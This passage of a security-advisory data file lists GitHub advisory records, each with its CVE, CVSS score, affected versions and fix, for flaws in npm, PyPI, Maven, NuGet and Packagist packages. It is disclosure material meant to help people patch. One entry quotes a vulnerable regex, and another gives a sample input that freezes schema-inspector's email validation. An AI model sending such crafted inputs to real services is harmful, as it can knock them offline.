['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T19:41:48Z', 'nvd_published_at': '2021-03-15T18:15:00Z'}"
+1.4.0,GHSA-xfhp-gmh8-r8v2,2023-09-08T20:24:11Z,2021-03-19T21:22:10Z,,['CVE-2021-23354'],printf vulnerable to Regular Expression Denial of Service (ReDoS),"The package printf before 0.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex string
+```regex
+/\%(?:\(([\w_.]+)\)|([1-9]\d*)\$)?([0 +\-\]*)(\*|\d+)?(\.)?(\*|\d+)?[hlL]?([\%bscdeEfFgGioOuxX])/g
+```
+ in `lib/printf.js`. The vulnerable regular expression has cubic worst-case time complexity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'printf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23354'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/issues/31'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/pull/32'}, {'type': 'WEB', 'url': 'https://github.com/adaltas/node-printf/commit/a8502e7c9b0b22555696a2d8ef67722086413a68'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PRINTF-1072096'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:59:14Z', 'nvd_published_at': '2021-03-12T15:15:00Z'}"
+1.4.0,GHSA-v648-p92f-9996,2021-03-19T20:35:47Z,2021-03-29T20:57:39Z,,['CVE-2019-0925'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0925'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/32ca10f3955f2a3ca56c6671c721b1264eca06b8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0925'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:35:47Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-pq64-v7f5-gqh8,2023-08-07T11:43:18Z,2021-03-29T16:33:03Z,,['CVE-2021-27291'],Pygments vulnerable to Regular Expression Denial of Service (ReDoS),"In pygments 1.1+, fixed in 2.7.4, the lexers used to parse programming languages rely heavily on regular expressions. Some of the regular expressions have exponential or cubic worst-case complexity and are vulnerable to ReDoS. By crafting malicious input, an attacker can cause a denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pygments'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27291'}, {'type': 'WEB', 'url': 'https://github.com/pygments/pygments/commit/2e7e8c4a7b318f4032493773732754e418279a14'}, {'type': 'WEB', 'url': 'https://gist.github.com/b-c-ds/b1a2cc0c68a35c57188575eb496de5ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/pygments/pygments'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00024.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00003.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00006.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GSJRFHALQ7E3UV4FFMFU2YQ6LUDHAI55/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSLD67LFGXOX2K5YNESSWAS4AGZIJTUQ/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4878'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4889'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T20:28:40Z', 'nvd_published_at': '2021-03-17T13:15:00Z'}"
+1.4.0,GHSA-vqcj-wrf2-7v73,2023-09-04T16:27:22Z,2021-03-18T19:55:27Z,,['CVE-2020-35654'],Pillow Out-of-bounds Write,"In Pillow before 8.1.0, TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35654'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BYVI5G44MRIPERKYDQEL3S3YQCZTVHE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BF553AMNNNBW7SH4IM4MNE4M6GNZQ7YD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:18:25Z', 'nvd_published_at': '2021-01-12T09:15:00Z'}"
+1.4.0,GHSA-4wv4-mgfq-598v,2021-03-12T19:13:27Z,2021-03-12T23:00:19Z,,[],Code injection in nobelprizeparser,Code injection through use of eval.,[],"[{'package': {'ecosystem': 'npm', 'name': 'nobelprizeparser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/AnneTheDev/nobelprize/security/advisories/GHSA-4wv4-mgfq-598v'}, {'type': 'WEB', 'url': 'https://github.com/AnneTheDev/nobelprize/commit/00639d375b0efd097bc1eca18d9dc021691b9286'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/nobelprizeparser'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T19:13:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f38p-c2gq-4pmr,2022-07-05T18:05:18Z,2021-03-19T20:14:21Z,,['CVE-2021-21267'],Regular Expression Denial-of-Service in npm schema-inspector,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+Email address validation is vulnerable to a denial-of-service attack where some input (for example `a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.`) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+Users should upgrade to version 2.0.0, which uses a regex expression that isn't vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case.
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+If a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a ""not yet validated"" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways.
+
+### References
+_Are there any links users can visit to find out more?_
+https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f
+
+### For more information
+If you have any questions or comments about this advisory, you can create an issue in this repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'schema-inspector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/schema-inspector/schema-inspector/security/advisories/GHSA-f38p-c2gq-4pmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21267'}, {'type': 'WEB', 'url': 'https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f'}, {'type': 'WEB', 'url': 'https://github.com/schema-inspector/schema-inspector/releases/tag/2.0.0'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0006/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/schema-inspector'}]","{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:14:08Z', 'nvd_published_at': '2021-03-19T21:15:00Z'}"
+1.4.0,GHSA-hwpc-8xqv-jvj4,2022-10-25T20:37:12Z,2021-03-22T23:28:38Z,,['CVE-2021-21345'],XStream is vulnerable to a Remote Command Execution attack,"### Impact
+The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21345](https://x-stream.github.io/CVE-2021-21345.html).
+
+### Credits
+钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21345'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21345.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:24:01Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-fvgf-6h6h-3322,2023-09-05T14:35:06Z,2021-03-18T20:29:49Z,,['CVE-2021-3281'],Django Directory Traversal via archive.extract,"In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by ""startapp --template"" and ""startproject --template"") allows directory traversal via an archive with absolute paths or relative paths with dot segments.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3281'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/02e6592835b4559909aa3aaaf67988fef435f624'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/21e7622dec1f8612c85c2fc37fe8efbfd3311e37'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/52e409ed17287e9aabda847b6afe58be2fa9f86a'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/3.0.12/'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YF52FKEH5S2P5CM4X7IXSYG67YY2CDOO/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210226-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/feb/01/security-releases/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:34:01Z', 'nvd_published_at': '2021-02-02T07:15:00Z'}"
+1.4.0,GHSA-vw2g-5827-m9fp,2021-03-23T15:20:17Z,2021-03-29T20:55:52Z,,['CVE-2019-1308'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1335, CVE-2019-1366.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1308'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/64376deca69126c2bb05cd87bd5c073aedaf5f9c'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1308'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:20:17Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}"
+1.4.0,GHSA-8278-88vv-x98r,2021-03-10T21:51:06Z,2021-03-10T21:51:17Z,,['CVE-2021-21371'],Execution of untrusted code through config file,"### Impact
+It is possible to run arbitrary commands through the yaml.load() method. This could allow an attacker with local access to the host to run arbitrary code by running the application with a specially crafted YAML configuration file.
+
+### Workarounds
+Manually adjust yaml.load() to yaml.safe_load()
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [tenable/integration-jira-cloud](https://github.com/tenable/integration-jira-cloud/issues)
+* Email us at [vulnreport@tenable.com](mailto:vulnreport@tenable.com)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'tenable-jira-cloud'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.21'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tenable/integration-jira-cloud/security/advisories/GHSA-8278-88vv-x98r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21371'}, {'type': 'WEB', 'url': 'https://github.com/tenable/integration-jira-cloud/commit/f8c2095fd529e664e7fa25403a0a4a85bb3907d0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/tenable-jira-cloud/'}, {'type': 'WEB', 'url': 'https://pyyaml.docsforge.com/master/documentation/#loading-yaml'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T21:51:06Z', 'nvd_published_at': '2021-03-10T22:15:00Z'}"
+1.4.0,GHSA-9652-78hp-w58c,2021-03-19T22:19:46Z,2021-03-29T20:07:39Z,,['CVE-2021-3271'],Stored cross-site scripting in PressBooks,"PressBooks 5.17.3 contains a cross-site scripting (XSS). Stored XSS can be submitted via the Book Info's Long Description Body, and all actions to open or preview the books page will result in the triggering the stored XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pressbooks/pressbooks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.18.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3271'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks/pull/2072'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks/commit/941a8c5eaeacea5eb211b54ee55bc0348139cbd8'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks'}, {'type': 'WEB', 'url': 'https://www.gosecure.net/blog/2021/02/16/cve-2021-3271-pressbooks-stored-cross-site-scripting-proof-of-concept/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T22:19:46Z', 'nvd_published_at': '2021-02-18T19:15:00Z'}"
+1.4.0,GHSA-53r4-h27g-rg3x,2021-03-18T22:22:03Z,2021-03-29T20:59:07Z,,['CVE-2019-0992'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0992'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/53b75c5f4a206740375f6a8a96934242d556e7c4'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0992'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:22:03Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}"
+1.4.0,GHSA-hqqv-9x3v-mp7w,2021-03-16T16:31:12Z,2021-03-18T19:27:20Z,,['CVE-2020-7014'],Privilege Escalation Flaw in Elasticsearch,The fix for CVE-2020-7009 was found to be incomplete. Elasticsearch versions from 6.7.0 to 6.8.7 and 7.0.0 to 7.6.1 contain a privilege escalation flaw if an attacker is able to create API keys and also authentication tokens. An attacker who is able to generate an API key and an authentication token can perform a series of steps that result in an authentication token being generated with elevated privileges.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.7.0'}, {'fixed': '6.8.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7014'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200619-0003/'}, {'type': 'WEB', 'url': 'https://www.elastic.co/community/security/'}]","{'cwe_ids': ['CWE-266', 'CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T16:31:12Z', 'nvd_published_at': '2020-06-03T18:15:00Z'}"
+1.4.0,GHSA-xr9h-9m79-x29g,2021-02-24T06:59:10Z,2021-03-01T19:38:23Z,,['CVE-2020-8902'],SSRF in Rendertron,"Rendertron versions prior to 3.0.0 are are susceptible to a Server-Side Request Forgery (SSRF) attack. An attacker can use a specially crafted webpage to force a rendertron headless chrome process to render internal sites it has access to, and display it as a screenshot. Suggested mitigations are to upgrade your rendertron to version 3.0.0, or, if you cannot update, to secure the infrastructure to limit the headless chrome's access to your internal domain.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rendertron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8902'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChrome/rendertron/releases/tag/3.0.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rendertron'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T06:59:10Z', 'nvd_published_at': '2021-02-23T12:15:00Z'}"
+1.4.0,GHSA-9hx2-hgq2-2g4f,2021-12-02T17:47:58Z,2021-03-29T16:35:46Z,,['CVE-2021-25292'],Regular Expression Denial of Service (ReDoS) in Pillow,An issue was discovered in Pillow before 8.1.1. The PDF parser allows a regular expression DoS (ReDoS) attack via a crafted PDF file because of a catastrophic backtracking regex.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25292'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3bce145966374dd39ce58a6fc0083f8d1890719c'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/6207b44ab1ff4a91d8ddc7579619876d0bb191a4'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:05:35Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}"
+1.4.0,GHSA-5q6m-3h65-w53x,2022-08-03T17:21:06Z,2021-03-11T22:26:09Z,,['CVE-2021-24033'],react-dev-utils OS Command Injection in function `getProcessForPort`,"react-dev-utils prior to v11.0.4 exposes a function, `getProcessForPort`, where an input argument is concatenated into a command string to be executed. This function is typically used from react-scripts (in Create React App projects), where the usage is safe. Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-dev-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '11.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-24033'}, {'type': 'WEB', 'url': 'https://github.com/facebook/create-react-app/pull/10644'}, {'type': 'WEB', 'url': 'https://github.com/facebook/create-react-app/commit/f5e415f3a5b66f07dcc60aba1b445fa7cda97268'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebook/create-react-app'}, {'type': 'WEB', 'url': 'https://www.facebook.com/security/advisories/cve-2021-24033'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/1-npm-react-dev-utils/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T22:18:08Z', 'nvd_published_at': '2021-03-09T01:15:00Z'}"
+1.4.0,GHSA-x79j-wgqv-g8h2,2021-03-29T18:02:42Z,2021-03-23T01:54:06Z,,['CVE-2021-21358'],Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in typo3/cms-form,"
+### Problem
+It has been discovered that the Form Designer backend module of the Form Framework is vulnerable to cross-site scripting. A valid backend user account with access to the form module is needed to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 10.4.14 or 11.1.1 that fix the problem described.
+
+### Credits
+Thanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue.
+
+### References
